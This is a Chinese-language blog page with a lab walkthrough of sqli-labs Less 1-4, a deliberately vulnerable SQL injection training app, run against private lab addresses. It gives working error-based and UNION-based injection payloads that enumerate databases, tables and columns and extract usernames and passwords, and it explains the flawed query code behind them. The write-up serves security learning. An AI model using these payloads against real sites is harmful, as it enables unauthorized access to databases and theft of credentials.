<!DOCTYPE html>
<html lang="en">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/微信图片_20200713154033.jpg">
  <link rel="icon" type="image/png" href="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/微信图片_20200713154033.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>sqli-less1-4 - SuQieR&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_yg9cfy8wd6.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
<meta name="generator" content="Hexo 4.2.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>SuQieR's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                主页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814123743.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2020-07-30 11:29">
      July 30, 2020 am
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      20
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
            <article class="markdown-body">
              <h1 id="sqli-less-1-4"><a href="#sqli-less-1-4" class="headerlink" title="sqli less 1-4"></a>sqli less 1-4</h1><h2 id="less1"><a href="#less1" class="headerlink" title="less1"></a>less1</h2><ul>
<li><p>直接在url后添加了‘号触发报错，效果如图</p>
<table>
<thead>
<tr>
<th><a href="http://172.18.9.66/sqli/Less-1/?id=1&#39;" target="_blank" rel="noopener">http://172.18.9.66/sqli/Less-1/?id=1&#39;</a></th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200727134051.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>从上述错误中，可以看到1’经过sql语句构造后形成<code>&#39;&#39;1&#39;&#39; LIMIT 0,1&#39;</code> 多出了个单引号，从错误中得到想要的信息后，通过<code>&#39;or 1=1 --+</code>注释将多余的’去掉</p>
</li>
<li><p>构造的sql语句应该如下表格中显示的一致,提交后正常返回数据</p>
<table>
<thead>
<tr>
<th>select * from users where id=’1’ or 1=1 –+’ limit 0,1</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200727134851.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>此处可以用order by对数据进行排列，超过一定列数会报错，可以利用这一机制探测列数</p>
<ul>
<li>这里只能用order by 3 ，超过order by3 就会报错</li>
<li><code>&#39;order by 4--+</code>的结果显示超出</li>
</ul>
<table>
<thead>
<tr>
<th><a href="http://172.18.9.66/sqli/Less-1/?id=1&#39;" target="_blank" rel="noopener">http://172.18.9.66/sqli/Less-1/?id=1&#39;</a> order by 4 –+</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200727135418.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>分析源码为什么会造成sql注入，查询的sql语句如下</p>
<table>
<thead>
<tr>
<th>select * from users where id=’$id’ limit 0,1;</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200727135610.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li><p>id 在拼接sql语句时，没有对id进行任何过滤，当提交<code>&#39; or 1=1 --+</code> 构造的sql语句就是</p>
<pre><code class="hljs sql"><span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> <span class="hljs-keyword">users</span> <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span>=<span class="hljs-string">''</span><span class="hljs-keyword">or</span> <span class="hljs-number">1</span>=<span class="hljs-number">1</span> <span class="hljs-comment">--+ limit 0,1;</span>
这条语句因 <span class="hljs-keyword">or</span> <span class="hljs-number">1</span>=<span class="hljs-number">1</span> 所以永恒为真</code></pre>
</li>
</ul>
</li>
<li><p>这里着重记一下union联合注入，union的作用是将两个sql语句进行联合。强调一下union前后的两个sql语句的选择列数要相同才可以。union all 和 union  的区别是增加了去重的功能。</p>
<ul>
<li><p>结合sql注入基础篇中的information_schema的知识点，对less1进行注入。</p>
</li>
<li><p>当id的数据在数据库中不存在时，可以id=-1，两个sql语句进行联合操作时，当前一个语句查询内容为空时，后面的语句内容才会显示出来，此处网页返回了构造的union数据</p>
</li>
<li><p>爆数据库 payload:</p>
<pre><code class="hljs sql">http://192.168.5.135/sqli/Less-1/?id=-1%27 union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-keyword">group_concat</span>(schema_name),<span class="hljs-number">3</span> <span class="hljs-keyword">from</span> information_schema.schemata <span class="hljs-comment">--+</span></code></pre>

<table>
<thead>
<tr>
<th>此处sql语句为 select * from users where id =’-1’ union select 1,group_concat(schema_name),3 from information_schema.schemata –+ limit 0,1</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814101641.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
</li>
</ul>
<ul>
<li><p>爆当前数据库的数据表payload:</p>
<pre><code class="hljs sql">http://172.18.9.66/sqli/Less-1/?id=-1%27 union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-keyword">group_concat</span>(table_name),<span class="hljs-number">3</span> <span class="hljs-keyword">from</span> information_schema.tables <span class="hljs-keyword">where</span> table_schema=<span class="hljs-string">"security"</span> <span class="hljs-comment">--+</span></code></pre>

<table>
<thead>
<tr>
<th>sql语句为 select * from users where id = ‘-1’ union select 1,group _concat(table_name),3 from information_schema.tables  where table_schema = “security” –+ limit 0,1</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200727154802.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>爆users表的列</p>
<pre><code class="hljs sql">http://192.168.5.135/sqli/Less-1/?id=-1%27 union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-keyword">group_concat</span>(column_name),<span class="hljs-number">3</span> <span class="hljs-keyword">from</span> information_schema.columns <span class="hljs-keyword">where</span> table_name = <span class="hljs-string">"users"</span> <span class="hljs-comment">--+</span></code></pre>

<table>
<thead>
<tr>
<th>sql语句: select * from users where id=’-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name = “users” –+</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814103732.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>爆数据</p>
<pre><code class="hljs sql">http://192.168.5.135/sqli/Less-1/?id=-1%27 union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,username,<span class="hljs-keyword">password</span> <span class="hljs-keyword">from</span> <span class="hljs-keyword">users</span> <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span>=<span class="hljs-number">3</span> <span class="hljs-comment">--+</span></code></pre>

<table>
<thead>
<tr>
<th>sql语句：select * from user where id = ‘-1’  union select 1,username,password from users  where id=3 –+</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814105002.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<ul>
<li>less 1-4都可以使用union联合注入，下文不重复操作了。</li>
</ul>
<h2 id="less2"><a href="#less2" class="headerlink" title="less2"></a>less2</h2><ul>
<li><p>将单引号添加到id后，返回报错</p>
<table>
<thead>
<tr>
<th><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814114531.png" srcset="/img/loading.gif" alt=""></th>
</tr>
</thead>
<tbody><tr>
<td>You have an error in your SQL syntax; check the  manual that corresponds to your MySQL server version for the right  syntax to use near ‘’ LIMIT 0,1’ at line 1</td>
</tr>
</tbody></table>
</li>
<li><p>执行的查询语句为</p>
<pre><code class="hljs sql"><span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span>  <span class="hljs-keyword">table</span> <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span> = <span class="hljs-number">1</span><span class="hljs-string">'</span></code></pre>

<ul>
<li>报错多了一个单引号，所以这里的单引号破坏了查询返回了报错，查询代码应该为 id= 一个整数</li>
</ul>
<pre><code class="hljs sql"><span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> talbe  <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span> = <span class="hljs-built_in">int</span></code></pre>

<ul>
<li>打开less2源代码sql查询语句如下，id没有经过处理</li>
</ul>
<pre><code class="hljs sql">$sql="<span class="hljs-keyword">SELECT</span> * <span class="hljs-keyword">FROM</span> <span class="hljs-keyword">users</span> <span class="hljs-keyword">WHERE</span> <span class="hljs-keyword">id</span> = $<span class="hljs-keyword">id</span> <span class="hljs-keyword">LIMIT</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span><span class="hljs-string">";</span></code></pre>

<ul>
<li>可成功的注入为</li>
</ul>
<table>
<thead>
<tr>
<th>or 1= 1 –+     # 这里不加–+只用or 1=1 也可以</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814115823.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>其余的payload和less1一样，将单引号’去掉即可，不重复了。</p>
</li>
</ul>
<h2 id="less3"><a href="#less3" class="headerlink" title="less3"></a>less3</h2><ul>
<li><p>输入单引号报错</p>
<table>
<thead>
<tr>
<th><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814120120.png" srcset="/img/loading.gif" alt=""></th>
</tr>
</thead>
<tbody><tr>
<td>You have an error  in your SQL syntax; check the manual that corresponds to your MySQL  server version for the right syntax to use near ‘’1’’) LIMIT 0,1’ at  line 1</td>
</tr>
</tbody></table>
<ul>
<li><p>从返回的报错来看，多出了一个)，那么查询语句应该为</p>
<pre><code class="hljs sql"><span class="hljs-keyword">select</span> login_name,<span class="hljs-keyword">password</span> <span class="hljs-keyword">from</span> talbe <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span> = ($<span class="hljs-keyword">id</span>)</code></pre>
</li>
<li><p>补全),使用该代码注入<code>?id=1&#39;)--+</code>,这样一来就输出账号密码了，后续的查询也被注释了</p>
</li>
</ul>
<table>
<thead>
<tr>
<th><a href="http://192.168.5.135/sqli/Less-3/?id=1&#39;" target="_blank" rel="noopener">http://192.168.5.135/sqli/Less-3/?id=1&#39;</a>) –+</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814120617.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>可成功注入的有</p>
<pre><code class="hljs sql">')or'1'=('1
)or1=1<span class="hljs-comment">--+</span></code></pre>
</li>
<li><p>其余payload在less1的’后加)即可</p>
</li>
</ul>
<h2 id="less4"><a href="#less4" class="headerlink" title="less4"></a>less4</h2><ul>
<li><p>输入id=1”</p>
<table>
<thead>
<tr>
<th><img src="C:%5CUsers%5CHeBe%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200814121202249.png" srcset="/img/loading.gif" alt="image-20200814121202249"></th>
</tr>
</thead>
<tbody><tr>
<td>You have an error  in your SQL syntax; check the manual that corresponds to your MySQL  server version for the right syntax to use near ‘“1””) LIMIT 0,1’ at  line 1</td>
</tr>
</tbody></table>
<ul>
<li>多了一个双引号和反括号，可见这是对id参数使用了””和()进行包装</li>
<li>使用<code>id=1 &quot;) --+</code>进行注入，输出了账号密码，后续查询也被注释掉了</li>
</ul>
<table>
<thead>
<tr>
<th><a href="http://192.168.5.135/sqli/Less-4/?id=1&quot;" target="_blank" rel="noopener">http://192.168.5.135/sqli/Less-4/?id=1&quot;</a>) –+</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814121427.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>查询源代码得知查询语句为<code>$sql=&quot;SELECT*FROMusersWHEREid=(“$id”)LIMIT0,1&quot;;</code></p>
<ul>
<li>可成功注入payload</li>
</ul>
<pre><code class="hljs sql">“)or”1”=(“1
“)or1=1<span class="hljs-comment">--+</span></code></pre>
</li>
<li><p>其他payload同less1，将‘替换为”)即可</p>
</li>
</ul>

            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/sqli-labs/">sqli-labs</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/sql%E6%B3%A8%E5%85%A5/">sql注入</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                      <a href="/2020/07/31/%E8%A7%A3%E5%86%B3firefox_%E5%A4%8D%E5%88%B6url_%E4%BC%9A%E8%87%AA%E5%8A%A8encodeurl/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">解决firefox复制url会自动encodeurl</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/07/27/sqli%E6%89%8B%E6%B3%A8%E5%9F%BA%E7%A1%80/">
                        <span class="hidden-mobile">sqli手注基础</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Power by SuQieR</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Hexo theme by Fluid</span></a>
    </div>
    

    
  <!-- 备案信息 -->
  <div class="beian">
    <a href="http://beian.miit.gov.cn/" target="_blank"
       rel="nofollow noopener">京 ICP 备 20020711 号</a>
    
      <a
        href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=20020711"
        rel="nofollow noopener"
        class="beian-police"
        target="_blank"
      >
        <span class="beian-police-sep">&nbsp;|&nbsp;</span>
        
          <img src="/img/police_beian.png" srcset="/img/loading.gif" alt="police-icon" />
        
        <span>京公网安备 11010802032018 号</span>
      </a>
     
  </div>


    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: 'article.markdown-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "sqli-less1-4&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>







  
  
    <script type="text/javascript">
      //定义获取词语下标
      var a_idx = 0;
      jQuery(document).ready(function ($) {
        //点击body时触发事件
        $("body").click(function (e) {
          //需要显示的词语
          var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正", "法治", "爱国", "敬业", "诚信", "友善");
          //设置词语给span标签
          var $i = $("<span/>").text(a[a_idx]);
          //下标等于原来下标+1  余 词语总数
          a_idx = (a_idx + 1) % a.length;
          //获取鼠标指针的位置，分别相对于文档的左和右边缘。
          //获取x和y的指针坐标
          var x = e.pageX, y = e.pageY;
          //在鼠标的指针的位置给$i定义的span标签添加css样式
          $i.css({
            "z-index": 999,
            "top": y - 20,
            "left": x,
            "position": "absolute",
            "font-weight": "bold",
            "color": rand_color()
          });
          // 随机颜色
          function rand_color() {
            return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
          }
          //在body添加这个标签
          $("body").append($i);
          //animate() 方法执行 CSS 属性集的自定义动画。
          //该方法通过CSS样式将元素从一个状态改变为另一个状态。CSS属性值是逐渐改变的，这样就可以创建动画效果。
          //详情请看http://www.w3school.com.cn/jquery/effect_animate.asp
          $i.animate({
            //将原来的位置向上移动180
            "top": y - 180,
            "opacity": 0
            //1500动画的速度
          }, 1500, function () {
            //时间到了自动删除
            $i.remove();
          });
        });
      })
      ;
    </script>
  














</body>
</html>
